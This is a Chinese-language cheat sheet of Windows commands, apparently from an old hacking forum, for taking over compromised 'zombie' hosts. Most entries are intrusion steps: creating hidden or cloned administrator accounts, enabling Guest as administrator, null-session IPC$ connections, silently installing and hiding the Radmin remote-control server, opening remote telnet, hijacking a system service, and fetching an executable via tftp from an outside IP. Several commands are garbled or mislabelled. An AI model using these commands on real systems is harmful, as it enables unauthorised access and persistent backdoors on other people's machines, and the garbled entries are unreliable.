常用命令 　　控制面版：运行>>>>>>>>>>>:control 　　计算机管理：* MMC 　　结束进程：NET SHARE 　　查看版本：ver 　　查看中端(服务）：net start 　　查看文件：dir 　　查看3389： 　　加用户：c:\winnt\system32>net user adminserver admin /add 　　提权限：net localgroup administrators adminserver /add 　　211.38.172.2 2180 　　查看用户net user 　　远程连接到主机CMD命令：telnet 主机IP 　　踢人：logoff ID 　　查看当前人：query user 　　打开[url=]telnet:net start telnet 　　telnet连接工具：OpenTelnet 　　删除共享： net share c=c:\ 　　删除共享： net share c /del 　　启用GUEST：net user guest /active:yes 　　为GUEST设密码：net user guest 888888 　　提升到管理员：net localgroup“Administrators“guest /add 　　超级用户隐藏器:c:\door adminserver:admin 　　克隆帐号：ca [url=]\\IP 你建立的帐号 密码 肉机默认帐号 密码 　　ca [url=]\\127.0.0.1 adminserver admin adminserver admin 　　完全禁止系统模认工享 　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee}] 　　3389替换服务----------------------- 　　中修改[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] 　　c:\winnt\system32\copy termsrv.exe service.exe 　　c:\winnt\system32\cd.. 　　c:\winnt\sc [url=]\\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe 　　端口转向：f:\web\ftp.exe“c:\fpipe.exe -v -l 开放的端口 -r 要转向的端口 ip“ 　　使用空口令连接: 　　net use \\对方IP\ipc““/user:“administrator“ 　　(在上传文件的目录下)远程复制文件: 　　c: admin>net use [url=]\\a-01\ipc“12345“/user:administrator 　　c: amdin>copy r_server.exe [url=]\\a-01\admin\system32 　　c: amdin>copy radmin.reg [url=]\\a-01\admin\sytem32 　　在对方CMD下： 　　c:\winnt\system32\>regedit /s radmin.reg 　　c:\winnt\system32\>r_server.exe /install /silenec 　　net start r_server 　　copy r_server.exe \\对方IP\admin\system32 　　c:\opentelnet.exe [url=]\\IP ADMINISTRATOR““0 90 　　copy 文件名 [url=]\\IP\admin\system32 　　进入对方CMD: 　　c:\opentelnet.exe [url=]\\Ip administrator““0 90 　　登陆CMD: 　　c:\telnet IP 90 　　安装RADMIN: 　　c:\winnt\system32\ 　　r_server /install silence 　　c:\winnt\system32\ 　　r-server 　　导入注册表: 　　c:\winnt\system32 egedit.exe /s aaa.reg 　　看端口: 　　c:\winnt\system32\ 　　netstat -an 　　改端口: 　　c:\winnt\system32\ 　　r_server.exe /port:1024 /pass:1234 /save /silence 　　起动服务: 　　c:\winnt\system32 et start r_server 　　隐藏文件: 　　c:\winnt\system32\attrib.exe h r_server.exe h 　　%systemroot\system32 　　看看共享开了没有,没有的话把共享开开 　　c:\winnt\system32>net share 　　清单是空的。 　　c:\winnt\system32>net share ipc 　　命令成功完成。 　　c:\winnt\system32>net share admin 　　命令成功完成。 　　注册表运行命令 　　regedit 　　查看端口：netstat-n 　　SA传送文件TFTP 　　先在本机开tftp服务 sql* 　　tftp-i IP get windxp.exe c:\windows\system32\com\windxp.exe